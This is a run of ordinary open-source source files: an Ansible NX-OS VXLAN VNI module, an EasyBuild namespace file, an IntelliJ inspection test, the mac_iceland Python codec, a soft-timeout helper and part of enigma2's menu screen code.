            commands.append(command)
        elif key == 'peer-ip' and value != []:
            # One 'peer-ip <addr>' line per static peer.
            for peer in value:
                commands.append('{0} {1}'.format(key, peer))
        elif key == 'mcast-group' and value != existing_commands.get(key):
            # Remove any previously configured group before setting a new one.
            commands.append('no {0}'.format(key))
            vni_command = 'member vni {0}'.format(module.params['vni'])
            if vni_command not in commands:
                commands.append('member vni {0}'.format(module.params['vni']))
            if value != PARAM_TO_DEFAULT_KEYMAP.get('multicast_group', 'default'):
                commands.append('{0} {1}'.format(key, value))
        elif key == 'ingress-replication protocol' and value != existing_commands.get(key):
            evalue = existing_commands.get(key)  # protocol currently configured
            dvalue = PARAM_TO_DEFAULT_KEYMAP.get('ingress_replication', 'default')
            if value != dvalue:
                # Switching protocols: the old protocol must be negated first.
                if evalue and evalue != dvalue:
                    commands.append('no {0} {1}'.format(key, evalue))
                commands.append('{0} {1}'.format(key, value))
            else:
                if evalue:
                    commands.append('no {0} {1}'.format(key, evalue))
        elif value is True:
            commands.append(key)
        elif value is False:
            commands.append('no {0}'.format(key))
        elif value == 'default' or value == []:
            # Explicit reset to default: negate whatever is configured.
            if existing_commands.get(key):
                existing_value = existing_commands.get(key)
                if key == 'peer-ip':
                    for peer in existing_value:
                        commands.append('no {0} {1}'.format(key, peer))
                else:
                    commands.append('no {0} {1}'.format(key, existing_value))
            else:
                if key.replace(' ', '_').replace('-', '_') in BOOL_PARAMS:
                    commands.append('no {0}'.format(key.lower()))
        else:
            command = '{0} {1}'.format(key, value.lower())
            commands.append(command)

    if commands:
        vni_command = 'member vni {0}'.format(module.params['vni'])
        ingress_replications_command = 'ingress-replication protocol static'
        ingress_replicationb_command = 'ingress-replication protocol bgp'
        ingress_replicationns_command = 'no ingress-replication protocol static'
        ingress_replicationnb_command = 'no ingress-replication protocol bgp'
        interface_command = 'interface {0}'.format(module.params['interface'])

        if any(c in commands for c in (ingress_replications_command, ingress_replicationb_command,
                                       ingress_replicationnb_command, ingress_replicationns_command)):
            # peer-ip lines live under the ingress-replication sub-mode, so
            # they become children of every other generated command.
            static_level_cmds = [cmd for cmd in commands if 'peer' in cmd]
            parents = [interface_command, vni_command]
            commands = [cmd for cmd in commands if 'peer' not in cmd]
            for cmd in commands:
                parents.append(cmd)
            candidate.add(static_level_cmds, parents=parents)
        elif 'peer-ip' in commands[0]:
            # Only the peer list changed: nest the lines under the already
            # configured 'ingress-replication protocol static' mode.
            static_level_cmds = [cmd for cmd in commands]
            parents = [interface_command, vni_command, ingress_replications_command]
            candidate.add(static_level_cmds, parents=parents)

        if vni_command in commands:
            parents = [interface_command]
            commands.remove(vni_command)
            # For L3 (assoc_vrf) VNIs the member line itself carries the
            # config, so it is not used as a parent.
            if module.params['assoc_vrf'] is None:
                parents.append(vni_command)
            candidate.add(commands, parents=parents)
def state_absent(module, existing, proposed, candidate):
    """Queue the commands that remove the VNI member from the NVE interface."""
    vni = module.params['vni']
    if existing['assoc_vrf']:
        removal = 'no member vni {0} associate-vrf'.format(vni)
    else:
        removal = 'no member vni {0}'.format(vni)
    candidate.add([removal],
                  parents=['interface {0}'.format(module.params['interface'])])
def main():
    """Ansible entry point: diff desired state against the device and apply."""
    argument_spec = dict(
        interface=dict(required=True, type='str'),
        vni=dict(required=True, type='str'),
        assoc_vrf=dict(required=False, type='bool'),
        multicast_group=dict(required=False, type='str'),
        peer_list=dict(required=False, type='list'),
        suppress_arp=dict(required=False, type='bool'),
        suppress_arp_disable=dict(required=False, type='bool'),
        ingress_replication=dict(required=False, type='str', choices=['bgp', 'static', 'default']),
        state=dict(choices=['present', 'absent'], default='present', required=False),
    )

    argument_spec.update(nxos_argument_spec)

    # assoc_vrf (an L3 VNI) excludes every L2-only option.
    mutually_exclusive = [('suppress_arp', 'suppress_arp_disable'),
                          ('assoc_vrf', 'multicast_group'),
                          ('assoc_vrf', 'suppress_arp'),
                          ('assoc_vrf', 'suppress_arp_disable'),
                          ('assoc_vrf', 'ingress_replication')]

    module = AnsibleModule(
        argument_spec=argument_spec,
        mutually_exclusive=mutually_exclusive,
        supports_check_mode=True,
    )

    warnings = list()
    result = {'changed': False, 'commands': [], 'warnings': warnings}

    if module.params['peer_list']:
        # A static peer list is only valid with static ingress replication.
        if module.params['peer_list'][0] != 'default' and module.params['ingress_replication'] != 'static':
            module.fail_json(msg='ingress_replication=static is required '
                                 'when using peer_list param')
        else:
            peer_list = module.params['peer_list']
            if peer_list[0] == 'default':
                # Collapse ['default'] to the sentinel string 'default'.
                module.params['peer_list'] = 'default'
            else:
                stripped_peer_list = list(map(str.strip, peer_list))
                module.params['peer_list'] = stripped_peer_list

    state = module.params['state']
    args = PARAM_TO_COMMAND_KEYMAP.keys()
    existing, interface_exist = get_existing(module, args)

    if state == 'present':
        if not interface_exist:
            module.fail_json(msg="The proposed NVE interface does not exist. Use nxos_interface to create it first.")
        elif interface_exist != module.params['interface']:
            module.fail_json(msg='Only 1 NVE interface is allowed on the switch.')
    elif state == 'absent':
        if interface_exist != module.params['interface']:
            # Interface absent or different -> nothing to remove, no change.
            module.exit_json(**result)
        elif existing and existing['vni'] != module.params['vni']:
            module.fail_json(
                msg="ERROR: VNI delete failed: Could not find vni node for {0}".format(module.params['vni']),
                existing_vni=existing['vni']
            )

    # Keep only user-supplied values that differ from the device state.
    proposed_args = dict((k, v) for k, v in module.params.items()
                         if v is not None and k in args)
    proposed = {}
    for key, value in proposed_args.items():
        if key in ['multicast_group', 'peer_list', 'ingress_replication']:
            # Map the 'default' keyword to the parameter's default value.
            if str(value).lower() == 'default':
                value = PARAM_TO_DEFAULT_KEYMAP.get(key, 'default')
        if key != 'interface' and existing.get(key) != value:
            proposed[key] = value

    candidate = CustomNetworkConfig(indent=3)
    if state == 'present':
        state_present(module, existing, proposed, candidate)
    elif existing and state == 'absent':
        state_absent(module, existing, proposed, candidate)

    if candidate:
        candidate = candidate.items_text()
        result['changed'] = True
        result['commands'] = candidate
        if not module.check_mode:
            # Push the generated commands to the device.
            load_config(module, candidate)

    module.exit_json(**result)
if __name__ == '__main__':
    # Standard Ansible module entry point.
    main()
|
gc3-uzh-ch/easybuild-framework
|
refs/heads/master
|
easybuild/__init__.py
|
3
|
##
# Copyright 2011-2014 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Declares EasyBuild namespace, in an extendable way.
@author: Jens Timmerman (Ghent University)
"""
from pkgutil import extend_path
# We're not the only distribution in this namespace: extend the module
# search path so other packages can contribute to the 'easybuild' namespace.
__path__ = extend_path(__path__, __name__)  # @ReservedAssignment
|
ThiagoGarciaAlves/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyCompatibilityInspection/raiseMultipleArgs.py
|
2
|
try:
a
except :
<warning descr="Python version 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7 do not support this syntax.">raise ImportError, ImportWarning</warning>
|
makermade/arm_android-21_arm-linux-androideabi-4.8
|
refs/heads/master
|
lib/python2.7/encodings/mac_iceland.py
|
593
|
""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless mac-iceland codec backed by the charmap tables below."""

    def encode(self, input, errors='strict'):
        return codecs.charmap_encode(input, errors, encoding_table)

    def decode(self, input, errors='strict'):
        return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    def encode(self, input, final=False):
        # Charmap encoding is stateless, so *final* needs no special handling.
        return codecs.charmap_encode(input, self.errors, encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    def decode(self, input, final=False):
        # Charmap decoding is stateless, so *final* needs no special handling.
        return codecs.charmap_decode(input, self.errors, decoding_table)[0]
class StreamWriter(Codec, codecs.StreamWriter):
    # Stream API inherits the stateless encode from Codec.
    pass
class StreamReader(Codec, codecs.StreamReader):
    # Stream API inherits the stateless decode from Codec.
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record registered for 'mac-iceland'."""
    return codecs.CodecInfo(
        name='mac-iceland',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x81 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe3' # 0x8B -> LATIN SMALL LETTER A WITH TILDE
u'\xe5' # 0x8C -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\xec' # 0x93 -> LATIN SMALL LETTER I WITH GRAVE
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf2' # 0x98 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xdd' # 0xA0 -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\xb4' # 0xAB -> ACUTE ACCENT
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\xc6' # 0xAE -> LATIN CAPITAL LETTER AE
u'\xd8' # 0xAF -> LATIN CAPITAL LETTER O WITH STROKE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\xa5' # 0xB4 -> YEN SIGN
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u220f' # 0xB8 -> N-ARY PRODUCT
u'\u03c0' # 0xB9 -> GREEK SMALL LETTER PI
u'\u222b' # 0xBA -> INTEGRAL
u'\xaa' # 0xBB -> FEMININE ORDINAL INDICATOR
u'\xba' # 0xBC -> MASCULINE ORDINAL INDICATOR
u'\u03a9' # 0xBD -> GREEK CAPITAL LETTER OMEGA
u'\xe6' # 0xBE -> LATIN SMALL LETTER AE
u'\xf8' # 0xBF -> LATIN SMALL LETTER O WITH STROKE
u'\xbf' # 0xC0 -> INVERTED QUESTION MARK
u'\xa1' # 0xC1 -> INVERTED EXCLAMATION MARK
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\xc0' # 0xCB -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc3' # 0xCC -> LATIN CAPITAL LETTER A WITH TILDE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0152' # 0xCE -> LATIN CAPITAL LIGATURE OE
u'\u0153' # 0xCF -> LATIN SMALL LIGATURE OE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\xff' # 0xD8 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\u0178' # 0xD9 -> LATIN CAPITAL LETTER Y WITH DIAERESIS
u'\u2044' # 0xDA -> FRACTION SLASH
u'\u20ac' # 0xDB -> EURO SIGN
u'\xd0' # 0xDC -> LATIN CAPITAL LETTER ETH
u'\xf0' # 0xDD -> LATIN SMALL LETTER ETH
u'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN
u'\xfe' # 0xDF -> LATIN SMALL LETTER THORN
u'\xfd' # 0xE0 -> LATIN SMALL LETTER Y WITH ACUTE
u'\xb7' # 0xE1 -> MIDDLE DOT
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2030' # 0xE4 -> PER MILLE SIGN
u'\xc2' # 0xE5 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xca' # 0xE6 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xcb' # 0xE8 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0xE9 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xEB -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xEC -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\xcc' # 0xED -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\uf8ff' # 0xF0 -> Apple logo
u'\xd2' # 0xF1 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xF3 -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0xF4 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\u0131' # 0xF5 -> LATIN SMALL LETTER DOTLESS I
u'\u02c6' # 0xF6 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u02dc' # 0xF7 -> SMALL TILDE
u'\xaf' # 0xF8 -> MACRON
u'\u02d8' # 0xF9 -> BREVE
u'\u02d9' # 0xFA -> DOT ABOVE
u'\u02da' # 0xFB -> RING ABOVE
u'\xb8' # 0xFC -> CEDILLA
u'\u02dd' # 0xFD -> DOUBLE ACUTE ACCENT
u'\u02db' # 0xFE -> OGONEK
u'\u02c7' # 0xFF -> CARON
)
### Encoding table (inverse of decoding_table, built by the codecs module)
encoding_table = codecs.charmap_build(decoding_table)
|
victor-lin/npact
|
refs/heads/acgt_gamma
|
pynpact/pynpact/softtimeout.py
|
2
|
import time
class Timeout(Exception):
    """Raised by SoftTimer when the tracked computation exceeds its deadline."""
    def __init__(self, **args):
        # Expose every keyword (tdiff, checkcount, steps, ...) as an
        # attribute on the exception for the caller to inspect.
        self.__dict__.update(args)
class SoftTimer(object):
    """Track elapsed wall-clock time against an optional deadline.

    Call :meth:`check` periodically from a long-running computation; once
    the deadline has passed it raises :class:`Timeout` carrying diagnostic
    attributes (elapsed time, number of checks, recorded steps).
    """
    deadline = None    # absolute time.time() after which check() raises, or None
    starttime = None   # time.time() when the timer was (re)started
    checkcount = 0     # number of times check() has been called
    steps = None       # labels passed to check(step=...), in order
    def __init__(self, timeout=None, **kwargs):
        self.set_timeout(timeout, from_now=True)
        self.steps = []
        super(SoftTimer, self).__init__(**kwargs)
    def set_timeout(self, timeout, from_now=False):
        """Arm (or disarm) the deadline ``timeout`` seconds after start.

        With ``from_now=True`` the start time is reset to now. A falsy or
        non-positive ``timeout`` disarms the deadline so check() never
        raises (the original kept a stale deadline in that case).
        """
        if from_now:
            self.starttime = time.time()
        if timeout and timeout > 0:
            if self.starttime is None:
                # Called with from_now=False before any start: anchor now
                # instead of crashing on None + timeout.
                self.starttime = time.time()
            self.deadline = self.starttime + timeout
        else:
            self.deadline = None
    def check(self, step=None, logfn=None, **kwargs):
        """Record a progress step and raise Timeout if past the deadline.

        Extra keyword arguments are attached to the raised Timeout.
        """
        self.checkcount += 1
        if step:
            self.steps.append(step)
        if logfn:
            logfn("Checking for timeout, %d time: %r", self.checkcount, step)
        t2 = time.time()
        if self.deadline and t2 > self.deadline:
            raise Timeout(tdiff=(t2 - self.starttime),
                          checkcount=self.checkcount,
                          steps=self.steps,
                          **kwargs)
|
Ophiuchus1312/enigma2-master
|
refs/heads/master
|
lib/python/Screens/Menu.py
|
1
|
from Screens.Screen import Screen
from Components.Sources.List import List
from Components.ActionMap import NumberActionMap
from Components.Sources.StaticText import StaticText
from Components.config import configfile
from Components.PluginComponent import plugins
from Components.config import config
from Components.SystemInfo import SystemInfo
from Tools.Directories import resolveFilename, SCOPE_SKIN
import xml.etree.cElementTree
from Screens.Setup import Setup, getSetupTitle
# Default title used when no menu-specific title is available.
mainmenu = _("Main menu")
# Parse the menu structure once, at import time, from the skin's menu.xml.
file = open(resolveFilename(SCOPE_SKIN, 'menu.xml'), 'r')
mdom = xml.etree.cElementTree.parse(file)
file.close()
class boundFunction:
	"""Callable that freezes a function together with positional arguments.

	Used throughout the menu code to build zero-argument callbacks.
	"""
	def __init__(self, fnc, *args):
		self.fnc = fnc
		self.args = args
	def __call__(self):
		# Return the wrapped function's result (the original discarded it),
		# so boundFunction can also be used where a value is needed.
		# Backward compatible: existing callers ignore the return value.
		return self.fnc(*self.args)
class MenuUpdater:
	"""Registry of menu entries added at runtime (e.g. by plugins).

	Entries are stored per menu id as [text, pos, module, screen, weight]
	lists and merged into the menu while it is being built.
	"""
	def __init__(self):
		self.updatedMenuItems = {}
	def addMenuItem(self, id, pos, text, module, screen, weight):
		"""Register an extra entry for menu *id* at position *pos*."""
		if not self.updatedMenuAvailable(id):
			self.updatedMenuItems[id] = []
		self.updatedMenuItems[id].append([text, pos, module, screen, weight])
	def delMenuItem(self, id, pos, text, module, screen, weight):
		"""Remove a previously registered entry (raises if unknown)."""
		self.updatedMenuItems[id].remove([text, pos, module, screen, weight])
	def updatedMenuAvailable(self, id):
		"""Return True if runtime entries exist for menu *id*."""
		# 'in' is equivalent to the Python-2-only dict.has_key().
		return id in self.updatedMenuItems
	def getUpdatedMenu(self, id):
		return self.updatedMenuItems[id]
# Module-level singleton through which plugins register extra menu entries.
menuupdater = MenuUpdater()
class MenuSummary(Screen):
	# LCD/summary companion screen for Menu; inherits everything from Screen.
	pass
class Menu(Screen):
ALLOW_SUSPEND = True
def okbuttonClick(self):
print "okbuttonClick"
selection = self["menu"].getCurrent()
if selection is not None:
selection[1]()
def execText(self, text):
exec text
def runScreen(self, arg):
# arg[0] is the module (as string)
# arg[1] is Screen inside this module
# plus possible arguments, as
# string (as we want to reference
# stuff which is just imported)
# FIXME. somehow
if arg[0] != "":
exec "from " + arg[0] + " import *"
self.openDialog(*eval(arg[1]))
def nothing(self): #dummy
pass
def openDialog(self, *dialog): # in every layer needed
self.session.openWithCallback(self.menuClosed, *dialog)
def openSetup(self, dialog):
self.session.openWithCallback(self.menuClosed, Setup, dialog)
def addMenu(self, destList, node):
requires = node.get("requires")
if requires:
if requires[0] == '!':
if SystemInfo.get(requires[1:], False):
return
elif not SystemInfo.get(requires, False):
return
MenuTitle = _(node.get("text", "??").encode("UTF-8"))
entryID = node.get("entryID", "undefined")
weight = node.get("weight", 50)
x = node.get("flushConfigOnClose")
if x:
a = boundFunction(self.session.openWithCallback, self.menuClosedWithConfigFlush, Menu, node)
else:
a = boundFunction(self.session.openWithCallback, self.menuClosed, Menu, node)
#TODO add check if !empty(node.childNodes)
destList.append((MenuTitle, a, entryID, weight))
def menuClosedWithConfigFlush(self, *res):
configfile.save()
self.menuClosed(*res)
def menuClosed(self, *res):
if res and res[0]:
self.close(True)
def addItem(self, destList, node):
requires = node.get("requires")
if requires:
if requires[0] == '!':
if SystemInfo.get(requires[1:], False):
return
elif not SystemInfo.get(requires, False):
return
item_text = node.get("text", "").encode("UTF-8")
entryID = node.get("entryID", "undefined")
weight = node.get("weight", 50)
for x in node:
if x.tag == 'screen':
module = x.get("module")
screen = x.get("screen")
if screen is None:
screen = module
print module, screen
if module:
module = "Screens." + module
else:
module = ""
